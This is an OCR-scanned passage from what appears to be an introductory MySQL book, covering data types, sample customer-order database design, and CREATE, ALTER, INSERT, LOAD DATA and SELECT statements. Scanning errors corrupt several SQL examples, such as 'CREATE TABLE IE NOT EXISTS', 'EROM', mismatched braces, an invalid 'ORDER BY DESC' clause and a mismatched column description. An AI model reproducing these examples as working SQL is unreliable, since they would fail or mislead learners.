if no specific number is provided. For example, when a table row is added 
with 5 in the auto-increment column, the next row is automatically assigned 
6 in that column unless a different number is specified. You might find auto¬ 
increment columns useful when you need unique numbers, such as a prod¬ 
uct number or an order number. 

Date and time data 

A third common type of data is date and time data. Data stored as a date can 
be displayed in a variety of date formats. You can use that data to determine 
the length of time between two dates or two times — or between a specific 
date or time and some arbitrary date or time. 

Enumeration data 

Sometimes, data can have only a limited number of values. For example, the 
only possible values for a column might be yes or no. MySQL provides a 
data type called enumeration for use with this type of data. You tell MySQL 
what values can be stored in the column (for example, yes and no), and 
MySQL doesn’t store any other values in that column. 
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M^SQL data t^pe names 

When you create a database, you tell MySQL what kind of data to expect in a 
particular column by using the MySQL names for data types. Table 3-3 shows 
the MySQL data types used most often in web database applications. 


Table 3-3 

MySQL Data Types 

MtfSQL Data Tifpe 

Description 

CHAR {length) 

Fixed-length character string. 

VARCHAR {length) 

Variable-length character string. The longest string 
that can be stored is length, which must be 
between 1 and 255. 

TEXT 

Variable-length character string with a maximum 
length of 64K of text. 

INT ( length) 

Integer with a range from -2147483648 to 
+2147483647. The number that can be displayed is 
limited by length. For example, if length is 4, 
only numbers from -999 to 9999 can be displayed, 
even though higher numbers are stored. 

INT ( length) 

UNSIGNED 

Integer with a range from 0 to 4294967295. 
length is the size of the numberthat can be 
displayed. For example, if length is 4, only num¬ 
bers from 0 to 9999 can be displayed, even though 
higher numbers are stored. 

BIGINT 

A large integer. The signed range is 
-9223372036854775808 to 9223372036854775807. 

The unsigned range isOto 18446744073709551615. 

DECIMAL 
{length,dec) 

Decimal number in which length is the number 
of characters that can be used to display the 
number, including decimal points, signs, and expo¬ 
nents, and dec is the maximum number of decimal 
places allowed. For example, 12.34 has a length 
of 5 and a dec of 2. 

DATE 

Date value with year, month, and date. Displays the 
value as yyyy-mm-dd (for example, 2013-04- 
03 for April 3,2013). 

TIME 

Time value with hour, minute, and second. Displays 
as HH:MM: SS. 


(continued) 
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Table 3-3 (continued) 

MifSQL Data Ti^pe 

Description 

DATETIME 

Date and time are stored together. Displays as 

YYYY-MM-DD HH:MM:SS. 

ENUM 

(" vail", " val2"...) 

Only the values listed can be stored. A maximum of 
65,535 values can be listed. 

SERIAL 

A shortcut name for BIGINT unsigned not 
NULL AUTO_INCREMENT. 


MySQL allows many data types other than those listed in Table 3-3, but you 
probably need those other data types less frequently. For a description of 
all the available data types, see the MySQL online manual at http: / / dev. 
mysql.com/doc/refman/S.6/en/data-types.html. 


Designing a Sample batabase 

In this section, we design a sample database to contain customer order 
information. We use this database later in this chapter and in Chapter 4 of 
this minibook to show how to build and use a database. 

Create the following list of information that you want to store for each 
customer: 

♦ Name 

♦ Address 

♦ Phone number 
Fax number 

♦ E-mail address 

In addition, you need to collect information about which products the cus¬ 
tomers order. For each order, you need to collect the following information: 

♦ Date the order is placed 

♦ Product information for each item in the order 

In this example, the product is T-shirts. Therefore, you need the following 
Information for each item: 

• Number that identifies the specific product (such as a catalog number) 

• Size 

• Price 

• Color 
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You design the Customer database by following the steps presented in the 
“Organizing the data” section, earlier in this chapter, with this information 
in mind: 

1 . Name your database. 

The database for the order information is named 

CustomerOrderInformation. 

2. Identify the objects. 

The information list is 

• Customer name 

• Customer address 

• Customer phone number 

• Customer fax number 

• Customer e-mail address 

• Order date 

• Number that identifies the specific product (such as a catalog 
number) 

• Size 

• Color 

• Price 

The first five information items pertain to customers, so one object is 
Customer. The order date information pertains to the total order, so 
another object is CustomerOrder. The remaining four pieces of infor¬ 
mation pertain to each individual item in the order, so the remaining 
object is Orderitem. 

3 . Define and name a table for each object. 

The CustomerOrderInf ormation database needs the following tables: 

• Customer 

• CustomerOrder 

• Orderitem 

4. Identify the attributes for each object. 

Look at the information list in detail: 

• Customer ID: One attribute (a unique ID for each customer). 

• Customer name: Two attributes (first name and last name). 

• Customer address: Four attributes (street address, city, state, and 
ZIP code). 
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• Customer phone number: One attribute. 

• Customer fax number: One attribute. 

• Customer e-mail address: One attribute. 

• Order number: One attribute (a unique ID for each order). 

• Order date: One attribute. 

• Number that identifies the specific product (such as a catalog 
number): One attribute. 

• Size: One attribute. 

• Color: One attribute. 

• Price: One attribute. 

5. Define and name the columns. 

The Customer table has one row for each customer. The columns for 
the Customer table are 

• customerlD 

• firstName 

• lastName 

• street 

• city 

• state 

• zip 

• email 

• phone 

The CustomerOrder table has one row for each order with the follow¬ 
ing columns: 

• CustomerlD: This column links this table to the Customer table. 
This value is unique in the Customer table, but it’s not unique in this 
table. 

• orderlD 

• orderDate 

The Orderitem table has one row for each item in an order that 
includes the following columns: 

• catalogiD 

• order ID: This column links this table to the CustomerOrder table. 
This value is unique in the CustomerOrder table, but it’s not unique 
in this table. 
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• size 

• color 

• price 

6. Identify the primary key. 

The primary key for the Customer table is customeriD. Therefore, 
customer ID must be unique. The primary key for the CustomerOrder 
table is orderiD. The primary key for the Orderitem table is orderiD 
and catalogiD together. 

7. Define the defaults. 

No defaults are defined for any table. 

8. Identify columns with required data. 

The following columns should never be allowed to be empty: 

• customeriD 

• orderiD 

• catalogiD 

These columns are the primary-key columns. Never allow a row without 
these values in the tables. 

9 . Decide on the data type for storing each attribute. 

• Numeric: CustomeriD and orderiD are numeric data types. 

• Date: OrderDate is a date data type. 

• Character: All remaining fields are character data types. 
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You probably spent substantial time making the design decisions for your 
database. At this point, the decisions are firmly fixed in your mind. You 
probably don’t think that you can forget them. But suppose that a crisis 
Intervenes; you don’t get back to this project for two months. You have to 
analyze your data and make all the design decisions again if you didn’t write 
down the decisions you originally made. 

Write them down now. 

Document the organization of the tables, the column names, and all other 
design decisions. Your document should describe each table in table format, 
with a row for each column and a column for each design decision. For example, 
your columns would be column name, data type, and description. The 
three tables in the sample design for the database named CustomerOrder 
Information are documented in Table 3-4, Table 3-5, and Table 3-6. 
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Table 3-4 

Customer Table 

Column Name 

Data Ttfpe 

Description 

customerlD 

SERIAL 

Unique ID for customer (primary key) 

lastName 

VARCHAR(50) 

Customer's last name 

firstName 

VARCHAR(40) 

Customer's first name 

street 

VARCHAR(50) 

Customer's street address 

city 

VARCHAR(50) 

Customer's city 

state 

CHAR(2) 

Customer's state 

zip 

CHAR(10) 

Customer's ZIP code 

email 

VARCHAR(50) 

Customer's e-mail address 

fax 

CHAR(15) 

Customer's fax number 

phone 

CHAR(15) 

Customer's phone number 


Table 3-5 

CustomerOrder Table 

Variable Name 

Tifpe 

Description 

orderlD 

SERIAL 

Login name specified by user (primary key) 

customerlD 

BIGINT 

Customer ID of the customer who placed 
the order 

orderDate 

DATETIME 

Date and time that order was placed 


Table 3-6 

Orderltem Table 

Variable Name 

Tifpe 

Description 

catalogiD 

VARCHAR(15) 

Catalog number of the item (primary 
key 1) 

orderlD 

BIGINT 

Order ID of the orderthat includes 
this item (primary key 2) 

color 

VARCHAR(10) 

Color of the item 

size 

VARCHAR(10) 

Size of the item 

price 

DECIMAL(9,2) 

Price of the item 
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After you’ve carefully planned your database as described earlier in tbe 
chapter, you can then get to work building the database. A database has two 
parts: a structure to hold the data and the data Itself. In the following sections, 
we explain how to create the database structure. First, you create an empty 
database with no structure at all, and then you add tables to it. 

When you create a database, you create a new subdirectory in your data 
directory with the database name that you assign. Files are then added to 
this subdirectory later, when you add tables to the database. The data direc¬ 
tory is usually a subdirectory in the directory where MySQL is installed. You 
can set up a different directory as the data directory by adding a statement 
in the MySQL configuration file, my. cnf, in the following format: 

datadir=c:/xampp/mysql/data 

You can add this statement to the configuration file or change the statement 
that’s already there. 

You can create the database by using SQL statements, as described in 
Chapter 1 of this minibook. To create a database, you must use a MySQL 
account that has permission to create, alter, and drop databases and tables, 
and we tell you how to do that here. See Chapter 2 in this minibook for more 
on MySQL accounts. 


Creating a neW database 


Your first step in creating a new database is to create an empty database, 
giving it a name. Your database name can be up to 64 characters long. You 
can use most letter, numbers, and punctuation, with a few exceptions. In 
general, you can’t use characters that are illegal in directory names for your 
operating system (see your operating system documentation to find out 
what those characters are). Don’t use a space at the end of the name. Don’t 
use a forward slash (/) or a backward slash (\) in the database name (or in 
table names, either). You can use quotes in the database name, but it isn’t 
wise to do so. 

To create a new, empty database, use the following SQL statement: 

CREATE DATABASE databasename 

In this statement, replace databasename with the name that you give your 
database. For Instance, to create the sample database designed in this 
chapter, use the following SQL statement: 


CREATE DATABASE CustomerOrderInformation 
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Some web hosting companies don’t allow you to create a new database. The 
host gives you a specified number of databases to use with MySQL, and you 
can create tables in only the specified database(s). You can try requesting 
an additional database, but you need a good reason. MySQL and PHP don’t 
care that all your tables are in one database, rather than organized into data¬ 
bases with meaningful names. Humans can just keep track of projects more 
easily when those projects are organized. 


If a database with the name you specify already exists, an error message is 
returned. You can avoid this error message by using an if phrase in your 
statement, as follows: 


CREATE DATABASE IF NOT EXISTS CustomerOrderInformation 


With this statement, the database is created if it doesn’t exist, but the state¬ 
ment doesn’t fail if the database already exists. It just doesn’t create the new 
database. 


To see for yourself that a database was in fact created, use the show 
DATABASES SQL query. 

After you create an empty database, you can add tables to it. (Check out the 
section “Adding tables and specifying a primary key,” later in this chapter.) 


Creating and deleting a database 

You can delete any database, as long as you’re using a MySQL account with 
the DROP privilege. When you drop a database, all the tables and data in the 
database are dropped, as well. 

You can remove a database with the following SQL statement: 



DROP DATABASE databasename 

Use DROP carefully because it’s irreversible. After you drop a database, that 
database is gone forever. And any data that was in it is gone, as well. 

If the database doesn’t exist, an error message is returned. You can prevent 
an error message with the following statement: 


DROP DATABASE IF EXISTS databasename 


This statement drops the database if that database exists. If it doesn’t exist, 
no error occurs. The statement just ends quietly. 
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Adding tabtes and specifying a printarg keg 

You can add tables to any database, whether it’s a new, empty database that 
you just created or an existing database that already has tables and data in 
it. The rules for allowable table names are explained in the “Organizing the 
data” section, earlier in this chapter. When you create a table in a database, 
a file named tablename. frm is added to the database directory. 

When you create a table, you include the table definition. You define each 
column — giving it a name, assigning it a data type, and specifying any other 
definitions required. Here are some definitions often specified for columns: 

♦ NOT null: This column must have a value; it can’t be empty. 

♦ DEFAULT value: This value is stored in the column when the row is 
created if no other value is given for the column. 

♦ auto_increment: This definition creates a sequence number. As each 
row is added, the value of this column increases by one integer from the 
last row entered. You can override the auto number by assigning a spe¬ 
cific value to the column. 

♦ unsigned: This definition indicates that the values for this numeric field 
will never be negative numbers. 

You also specify the unique identifier for each row — the primary key. A 
table must have a field or a combination of fields that’s different for each 
row. No two rows can have the same primary key. If you attempt to add 
a row with the same primary key as a row already in the table, you get an 
error message, and the row isn’t added. 

Occasionally, you might want to create a table that has the same structure 
as an existing table. You can create a table that’s an empty copy. 

You can use the create statement to add tables to a database. The statement 
begins with the create table statement, as follows: 

CREATE TABLE tablename 

Then, you add a list of column names with definitions. Separate the infor¬ 
mation for each column from the information for the following column by a 
comma. Enclose the entire list in parentheses. Follow each column name by 
its data type and any other definitions required. 

The last item in a create table statement indicates which column or 
combination of columns is the primary key. You specify the primary key by 
using the following format: 
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PRIMARY KEY(columnname) 

Enclose the columnname in parentheses. If you’re using a combination of 
columns as the primary key, include all the column names in the parenthe¬ 
ses, separated by commas. For instance, you could designate the primary 
key as PRIMARY key (columnnamel,columnname2}. 

A complete create table statement has the following format: 

CREATE TABLE tablename ( 

columnname datatype definition! definition2 

columnname datatype definition! definition2 

PRIMARY KEY(columnname) ) 

Listing 3-1 shows the create table statement used to create the 
Customer table of the CustomerOrderinf ormation database. You could 
enter this statement on a single line if you wanted to. MySQL doesn’t care 
how many lines you use. The format shown in Listing 3-1 simply makes the 
statement easier for you to read. This human-friendly format also helps you 
spot typos. 


Listing 3-1: An SQL Statement for Creating a Table 


CREATE TABLE 

Customer ( 

CustomerlD 

SERIAL, 

lastName 

VARCHAR(50), 

firstName 

VARCHAR(40), 

street 

VARCHAR(50), 

city 

VARCHAR(50), 

state 

CHAR(2), 

zip 

CHAR(10), 

email 

VARCHAR(50), 

phone 

CHAR(15), 

fax 

CHAR(15), 

PRIMARY KEY( 

customerlD) ); 


Note that the list of column names in Listing 3-1 is enclosed in parentheses 
(one on the first line and one on the last line), and a comma follows each 
column definition. 



Remember not to use any MySQL reserved words for column names, as we 
discuss in the “Qrganizing the data” section, earlier in this chapter. If you 
use a reserved word for a column name, MySQL gives you an error message 
that looks like this: 


You have an error in your SQL syntax near 'order var(20))' at 
line 1 






Building a database m 


This error message shows the column definition that it didn’t like and the 
line where it found the offending definition. However, the message doesn’t 
tell you much about what the problem actually is. The error in your 
SQL syntax that it refers to is the use of the MySQL reserved word order 
as a column name. 

If you attempt to create a table that already exists, you receive an error mes¬ 
sage. You can prevent this error message appearing by using the following 
CREATE Statement: 

CREATE TABLE IE NOT EXISTS tablename 

If the table doesn’t exist, the statement creates it. If the table already exists, 
the statement doesn’t create it but also doesn’t return an error message. 

You can create a new table that’s an exact copy, with the same structure, of 
an existing table, as follows: 

CREATE TABLE tablename LIKE oldtablename 

The new table, tablename, is created with the same fields and definitions 
as oldtablename. Even if the old table contains data, the new table doesn’t 
include that data, just the structure. 

After you create a table, you can query to see it, review its structure, or 
remove it. 

♦ To see the tables that have been added to a database, use this query: 

SHOW TABLES 

♦ To see the structure of a table, use this query: 

EXPLAIN tablename 

RemoOin^ a table 

You can remove a table, whether it’s empty or contains data. Be sure you 
want to remove a table before you do it. 

Removing a table is irreversible. After you drop a table, that table is gone 
forever. And any data that was in it is gone, as well. 

To remove any table, use this statement: 
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Changing the Database Structure 

Your database isn’t written in stone. You can change the name of any table; 
add, drop, or rename a column in any table; or change the data type or other 
attributes of any column. 

Changing a database is not a rare occurrence. You might want to change 
your database for many reasons. For example, suppose that you defined the 
column lastName with VARCHAR (20) in a database that contains the names 
of all the employees in your company. At the time, 20 characters seemed 
sufficient for a last name. But you just received a memo announcing the new 
CEO, John Schwartzheimer-Losertman. Oops. MySQL will truncate his name 
to the first 20 letters, Schwartzheimer-Loser — a less-than-desirable new 
name for the boss. So you need to make the column wider — pronto. 

You can change the database structure with an alter statement. The basic 
format for this statement is alter table tablename, followed by the 
specified changes. Table 3-7 shows the changes that you can make. 


Table 3-7 Changes You Can Make with the ALTER Statement 

Change 

description 

ADD columnname definition 

Adds a column; definition 
includes the data type and optional 
definitions. 

ALTER columnname SET DEFAULT 

value 

Changes the default value for a 
column. 

ALTER columnname DROP 

DEFAULT 

Removes the default value for a 
column. 

CHANGE columnname 
newcolumnname definition 

Changes the definition of a column 
and renames the column; 
defini tion includes the data 
type and optional definitions. 

DROP columnname 

Deletes a column, including all the 
data in that column. The data can't 
be recovered. 

MODIFY columnname definition 

Changes the definition of a column; 
defini tion includes the data 
type and optional definitions. 

RENAME newtablename 

Renames a table. 
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For example, the following statement renames the Customer table to 
NewCustomer: 

ALTER TABLE Customer RENAME NewCustomer 

For another example, the following statement changes the specified column 
(lastName) to the specified data type (varchar) and width (50): 

ALTER TABLE Customer MODIFY lastName VARCHAR(50) 
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In This Chapter 

Storing data in the database 

Viewing and retrieving data from the database 

Updating data 

Deleting data 


n empty database is like an empty cookie jar — you get nothing out of 
w * it. And searching an empty database is no more interesting or fruitful 
than searching an empty cookie jar. A database is useful only with respect 
to the information that it holds. 


A database needs to be able to receive information for storage and to deliver 
information on request. For instance, the CustomerOrderinformation 
database described in earlier chapters needs to be able to receive the cus¬ 
tomer and order information, and it needs to be able to deliver its stored 
information when you request it. If you want to know the address of a par¬ 
ticular customer or the date a particular order was made, for example, the 
database needs to deliver that information when you request it. 

Your MySQL database responds to four types of requests: 

♦ Adding infonnation: Adding a row to a table. 

♦ Retrieving infonnation: Looking at the data. This request does not 
remove data from the database. 

♦ Updating information: Changing information in an existing row. This 
includes adding data to a blank field in an existing row. 

♦ Removing information: Deleting data from the database. 

You interact with the database through SQL statements and queries, as dis¬ 
cussed in Chapter 1 of this minibook. This chapter explains how to use SQL 
statements and queries to add, view, retrieve, update, and delete information 
in your database. 
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Adding Information to a Database 

Every database needs data. For example, you might want to add data to your 
database so that your users can look at it. Or you might want to create an 
empty database for users to put data into. In either scenario, data is added 
to the database. 

If your data is still on paper, you can enter it directly into a MySQL database, 
one row at a time, in an SQL statement. However, if you have a lot of data, 
this process could be tedious and involve a lot of typing. Suppose that you 
have information on 1,000 products that must be added to your database. 
Assuming that you’re greased lightning on a keyboard and can enter a row 
per minute, that’s 16 hours of rapid typing — well, rapid editing, anyway. 
Doable, but not fun. On the other hand, suppose that you need to enter 5,000 
members of an organization into a database and that it takes five minutes to 
enter each member. Now you’re looking at more than 400 hours of typing — 
who has time for that? 


If you have a large amount of data to enter, consider some alternatives. 
Sometimes scanning in the data is an option. Qr perhaps you need to beg, 
borrow, or hire some help. In many cases, it might be faster to enter the data 
into a big text file than to enter each row in a separate SQL statement. 



The SQL statement load can read data from a big text file (or even a small 
text file). So, if your data is already in a computer file, you can work with 
that file; you don’t need to type all the data again. Even if the data is in a 
format other than a text file (for example, in an Excel, Access, or Qracle file), 
you can usually convert the file to a text file, which can then be read into 
your MySQL database. If the data isn’t yet in a computer file and there’s a lot 
of data, it might be faster to enter that data into the computer in a text file 
and transfer it into MySQL as a second step. 


Most text files can be read into MySQL, but some formats are easier to read 
than others. If you’re planning to enter the data into a text file, read the sec¬ 
tion, “Adding a bunch of data,” to find the best format. Qf course, if the data 
is already on the computer, you have to work with the file as it is. 


Adding one row at a time 

If you have a small amount of data, you can add one row at a time to the 
table. PHP scripts often need to add one row at a time. For instance, when 
a PHP script accepts the data from a customer in a form, it usually needs to 
enter the information for the customer into the database in a new row. 
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You use the insert statement to add a row to a database. This statement 
tells MySQL which table to add the row to and what the values are for the 
fields in the row. The general form of the statement is 

INSERT INTO tablename (columnname, columnname,...,columnname) 
VALUES (value, value,value) 

The following rules apply to the insert statement: 

4- Values must be listed in the same order in which the column names 
are listed. The first value in the value list is inserted into the column 
that’s named first in the column list; the second value in the value list is 
inserted into the column that’s named second; and so on. 

♦ A column list, full or partial, is allowed. You don’t need to list all the 
columns. Columns that aren’t listed are given their default value or left 
blank if no default value is defined. 

Remember, any columns that are defined as NOT null must be 
included, with values, or the statement will fail. 

♦ A column list is not required. If you’re entering values for all the columns, 
you don’t need to list the columns at all. If no columns are listed, MySQL 
looks for values for all the columns, in the order in which they appear in 
the table. 

♦ The column list and value list must be the same. You must provide a 
value for every column that you list or you’ll get an error message like 
this: Column count doesn't match value count. 

The following insert statement adds a row to the Customer table: 


INSERT INTO Customer (lastName, street,city,state,zip, 
email,phone,fax) 

VALUES ("Contrary","1234 Garden St","Garden","NV","88888", 
"maryc@hergarden.com","{555} 555-5555", ""} 

Notice that f irstName isn’t listed in the column name list. No value is 
entered into the f irstName field. If f irstName were defined as NOT null, 
MySQL would not allow this. Also, if the definition for f irstName included a 
default, the default value would be entered, but because it doesn’t, the field 
is left empty. Notice that the value stored for fax is an empty string. 

To look at the data that you entered and ensure that you entered it correctly, 
use an SQL query that retrieves data from the database. We describe these 
SQL queries in detail in the “Retrieving Information from a Database” section, 
later in this chapter. In brief, the following query retrieves all the data in the 
Customer table: 
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Adding a bunch of data 

If you have a large amount of data to enter and it’s already in a computer 
file, you can transfer the data from the existing computer file to your MySQL 
database. 


Because data in a database is organized in rows and columns, the text file 
being read must indicate where the data for each column begins and ends 
and where the end of a row is. Here’s how you create that table structure: 

♦ Columns: To indicate columns, a specific character separates the data 
for each column. By default, MySQL looks for a tab character to sepa¬ 
rate the fields. However, if a tab doesn’t work for your data file, you can 
choose a different character to separate the fields and tell MySQL that a 
different character than the tab separates the fields. 

♦ Rows: Also by default, the end of a line is expected to be the end of a 
row — although you can choose a character to indicate the end of a line 
if you need to. A data file for an inventory table might look like this: 

Rock<TAB>Classic<TAB>Steely Dan<Tab>Aja<Tab>10.99 

RockTAB>Pop<TAB>Semisonic<Tab>All About 
Chemistry<Tab>ll.99 

Rock<TAB>Classic<TAB>Beatles<TAB>Abbey Road<Tab>9.99 


A data file with tabs between the fields is a tab-delimited file. Another common 
format is a comma-delimited file, where commas separate the fields. If your 
data is in another file format, you need to convert it into a delimited file. 



To convert data in another software’s file format into a delimited file, check 
the manual for that software or talk to your local expert who understands 
the data’s current format. Many programs, such as Excel, Access, and Qracle, 
allow you to output the data into a delimited file. For a text file, you might be 
able to convert it to delimited format by using the search-and-replace function 
of an editor or word processor. For a truly troublesome file, you might need 
to seek the help of an expert or a more experienced programmer. 


You can leave a field blank in the data file by including the field separators 
with no data between them. If the field is not defined as NOT null, the field 
is blank. If the field is defined as NOT null, loading the data file fails and an 
error message is returned. If one of the fields is an auto_increment field, 
such as a serial field, you can leave it blank and MySQL will insert the 
AUTO_iNCREMENT value. For instance, the following data file contains data 
to be loaded into the Customer table. 


,Smith,John,,Austin, TX,88888, , , 

,Contrary,Mary,,Garden,10,99999, , , 

,Sprat,Jack,,Pumpkin, NY,lllll,, , 

This data file is comma delimited. Each row starts with a comma, leaving the 
first field blank for the customeriD field, which is serial. Qther fields in 
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the row are also blank and will be blank in the database after the data file is 
loaded. 

The SQL statement that reads data from a text file is load. The basic form of 
the LOAD statement is 

LOAD DATA INFILE "path/datafilename" INTO TABLE tablename 

The statement loads data from a text file located on your server. If the file¬ 
name doesn’t include a path, MySQL looks for the data file in the directory 
where your table definition file, called tablename. frm, is located. By 
default, this file is located in a directory named for your database, such as a 
directory named CustomerOrderinf ormation. This directory is located 
in your data directory, which is located in the main directory where MySQL 
is installed. For example, if the file was named data. dat, the load state¬ 
ment might look for the file at C : XProgram FilesXMySQLXMySQL Server 
5.0\data\CustomerOrderInformation\data.dat. 

The basic form of the load statement can be followed by optional phrases if 
you want to change a default delimiter. The options are 

FIELDS TERMINATED BY 'character' 

FIELDS ENCLOSED BY 'character' 

LINES TERMINATED BY 'character' 

Suppose that you have the data file for the Customer table, except that the 
fields are separated by a comma rather than a tab. The name of the data file 
is customer. dat, and it’s located in the same directory as the database. 
The SQL statement to read the data into the table is 

LOAD DATA INFILE "customer.dat" INTO TABLE Customer 
FIELDS TERMINATED BY ',' 

To use the load data infile statement, the MySQL account must have 
the FILE privilege on the server host. We discuss MySQL account privileges 
in Chapter 2 of this minibook. 

You can also load data from a text file on your local computer by using the 
word LOCAL, as follows: 

LOAD DATA LOCAL INFILE "path/datafilename" 

INTO TABLE tablename 

You must include a path to the file. Use forward slashes for the path, even 
on a Windows computer, such as "C : /data/dataf ilel. txt ". If you get 
an error message when sending this statement, local might not be enabled. 
See http://dev.mysgl.com/doc/refman/5.1/en/load-data.html 
for more information on the local keyword. 
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To look at the data that you loaded — to make sure that it’s correct — use 
an SQL query that retrieves data from the database. We describe these types 
of SQL queries in detail in the next section. In brief, use the following query 
to look at all the data in the table so that you can check it: 

SELECT * FROM Customer 


Looking at the Data in a Database 

After data has been entered into a database, you might want to browse 
through the data to see whether the entered data looks correct or to get an 
idea of what type of data is in the database. You can also browse the data 
to determine simple information about the database, such as how many 
records it contains. 

You can see all the data in a table with the following query: 

SELECT * FROM tablename 

This query gets all the data from a table. You can find out how many records 
are in the table and get a general idea of the data by browsing the output. 

You can see exactly how many records are in a table with the following query: 

SELECT COUNT(*) FROM tablename 

This query outputs the number of records contained in the table. 


Retrieving Information from a Database 

The only purpose in storing information is to have it available when you 
need it. A database lives to answer questions. What products are for sale? 
Who are the customers? How many customers live in Indiana? What do the 
customers buy? 

Many questions are answered by retrieving data from the database. For 
instance, to find out how many customers live in Indiana, you can retrieve all 
customer records where the field named state contains IN. Very often, you 
ask these kinds of questions in a PHP script and display the answer in a web 
page. In a PHP script, you might retrieve all the records for Indiana customers 
and display a list of their names and addresses on a web page. 

To answer specific questions, you use the select query. You can ask precise, 
complex, and detailed questions with a select query. The simplest select 
query is 


SELECT * FROM tablename 
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This query retrieves all the information from the table. The asterisk (*) is a 
wildcard meaning all the columns. 

The SELECT query can be much more selective. SQL words and phrases in the 
SELECT query can pinpoint the information needed to answer your question. 
Here are some tricks you can make the select query perform: 

♦ You can request only the information (the columns) that you need to 
answer your question. For instance, you can request only the first and 
last names to create a list of customers. 

♦ You can request information in a particular order. For instance, you 
can request that the information be sorted in alphabetical order. 

♦ You can request information from selected objects (the rows) in your 
table. For instance, you can request the first and last names for only 
those customers whose addresses are in Florida. 

We tell you how to use these types of queries in the text that follows. 

In MySQL 4.1, MySQL added the capability to nest a select query inside 
another query. The nested query is called a subquery. You can use a subquery 
in SELECT, INSERT, UPDATE, Or DELETE Statements or in set clauses. A 
subquery can return a single value, a single row or column, or a table, which 
is used in the outer query. All the features of select queries can be used 
in subqueries. See the MySQL online manual at http: //dev.mysql. com/ 
doc/refman/5.5/en/subqueries .html for detailed information on using 
subqueries. 

Retriet/in^ specific information 

To retrieve specific information, list the columns containing the information 
you want. For example: 

select colutnnname,columnname,columnname,. .. FROM tablename 

This query retrieves the values from all the rows for the indicated 
column(s). For instance, the following query retrieves all the last names 
and first names from the lastName and f irstName columns stored in the 
Customer table: 

select lastName,firstName FROM Customer 

You can perform mathematical operations on columns when you select 
them. For example, you can use the following select query to add two col¬ 
umns: 
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Or you could use the following query: 

SELECT price,price*l.08 FROM Inventory 

The result is the price and the price with the sales tax of 8 percent added. 
You can change the name of a column when selecting it, as follows: 

SELECT price,price*l.08 AS priceWithTax FROM Inventory 

The AS clause tells MySQL to give the name priceWithTax to the second 
column retrieved. Thus, the query retrieves two columns of data: price and 
pric eWithTax. 

In some cases, you don’t want to see the values in a column, hut you want 
to know something about the column. For instance, you might want to know 
the lowest or highest value in the column. Table 4-1 lists some of the infor¬ 
mation that is available about a column. 


Table 4-1 

Information That Can Be Selected 

SQL Format 

description of Information 

AVG( columnname) 

Returns the average of all the values in 

columnname 

COUNT( columnname) 

Returns the number of rows in which 
columnname \s not blank 

MAX( columnname) 

Returns the largest value in columnname 

MIN( columnname) 

Returns the smallest value in columnname 

SUM( columnname) 

Returns the sum of all the values in columnname 


For example, the query to find out the highest price in an inventory table is 
SELECT MAX(price) FROM Inventory 

SQL words that look like max () and SUM (), with parentheses following the 
name, are functions. SQL provides many functions in addition to those in 
Table 4-1. Some functions, like those in Table 4-1, provide information about 
a column. Other functions change each value selected. For example, SQRT () 
returns the square root of each value in the column, and dayname () returns 
the name of the day of the week for each value in a date column, rather than 
the actual date stored in the column. More than 100 functions are available 
for use in a select query. For descriptions of all the functions, see the 
MySQL online manual at http : / /dev.mysql. com/doc/ref man/5.5/en/ 
functions.html. 
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Retrie(/in0 data in a specific order 

You might want to retrieve data in a particular order. For instance, in the 
Customer table, you might want customers organized in alphabetical order 
by last name. Or, in the inventory table, you might want the various prod¬ 
ucts grouped by category. 

In a SELECT query, order by and GROUP by affect the order in which the 
data is delivered to you: 

♦ ORDER by: To sort information, add this phrase to your select query: 

ORDER BY columnname 

The data is sorted by columnname in ascending order. For instance, if 
columnname is lastName, the data is delivered to you in alphabetical 
order by the last name. 

You can sort in descending order by adding desc before the column 
name. For example: 

SELECT * EROM Customers ORDER BY DESC lastName 

♦ GROUP by: To group information, use the following phrase: 

GROUP BY columnname 

The rows that have the same value of columnname are grouped 
together. For example, use this query to group the rows that have the 
same value as Category: 

SELECT * EROM Inventory GROUP BY Category 
You can use GROUP by and order by in the same query. 

Retriet/in^ data from specific roiVs 

Frequently, you don’t want all the information from a table. You want infor¬ 
mation only from selected rows. Three SQL words are frequently used to 
specify the source of the information: 

♦ WHERE: Allows you to request information from database objects with 
certain characteristics. For instance, you can request the names of cus¬ 
tomers who live in California, or you can list only products that are a 
certain category of clothes. 

♦ LIMIT: Allows you to limit the number of rows from which information 
is retrieved. For instance, you can request the information from only the 
first three rows in the table. 

♦ distinct: Allows you to request information from only one row of iden¬ 
tical rows. For instance, in a Login table, you can request loginName 
but specify no duplicate names, thus limiting the response to one record 
for each member. This would answer the question, “Has the customer 
ever logged in?” rather than the question “How many times has the cus¬ 
tomer logged in?” 
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Usin0 a WHERE clause 

The WHERE clause of the select query enables you to make complicated 
selections. For instance, suppose your boss wants to know all the custom¬ 
ers whose last names begin with B, who live in Indianapolis, and who have 
an 8 in either their phone or fax number. (We’re sure there are many uses 
for such a list.) You can get this list for your boss in a select query with a 
WHERE clause. 

The basic format of the where clause is 

WHERE expression AND|OR expression AND|OR expression ... 

expression specifies a value to compare with the values stored in the data¬ 
base. Only the rows containing a match for the expression are selected. You 
can use as many expressions as needed, each one separated by and or or. 
When you use and, both of the expressions connected by the and (that is, 
both the expression before the and and the expression after the and) must 
be true in order for the row to be selected. When you use OR, only one of the 
expressions connected by the OR must be true for the row to be selected. 

Some common expressions are shown in Table 4-2. 


Table 4-2 

Expressions for the WHERE Clause 

Expression 

Example 

Result 

column = value 

zip="12345" 

Selects only the rows 
where 12345 is stored 
in the column named 

zip 

column > value 

zip > "50000" 

Selects only the rows 
where the ZIP code is 
50001 or higher 

column >= value 

zip >= "50000" 

Selects only the rows 
where the ZIP code is 
50000 or higher 

column < value 

zip < "50000" 

Selects only the rows 
where the ZIP code 
is 49999 or lower 

column <= value 

zip <= "50000" 

Selects only the rows 
where the ZIP code 
is 50000 or lower 

column BETWEEN 

zip BETWEEN 

Selects only the rows 

valuel AND 

"20000" AND 

where the ZIP code 

value2 

"30000" 

is greaterthan 19999 
but less 30001 
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Expression 

Example 

Result 

column IN 
{valuel, value2 ,...) 

zip IN 

("90001","30044") 

Selects only the rows 
where the ZIP code 
is 90001 or 30044 

column NOT IN 
{valuel, value 2 ,...) 

zip NOT IN 
("90001","30044") 

Selects only the rows 
where the ZIP code is 
any ZIP code except 
90001 or 30044 

column LIKE 

value 

Note: value can 
contain the wildcards 
% (which matches any 
string) and _ (which 
matches any character). 

zip LIKE "9%" 

Selects all rows 
where the ZIP code 
begins with 9 

column NOT LIKE 

value 

Note: value can 
contain the wildcards 
% (which matches any 
string) and _ (which 
matches any character). 

zip NOT LIKE "9%" 

Selects all rows 
where the ZIP code 
doesn't begin with 9 
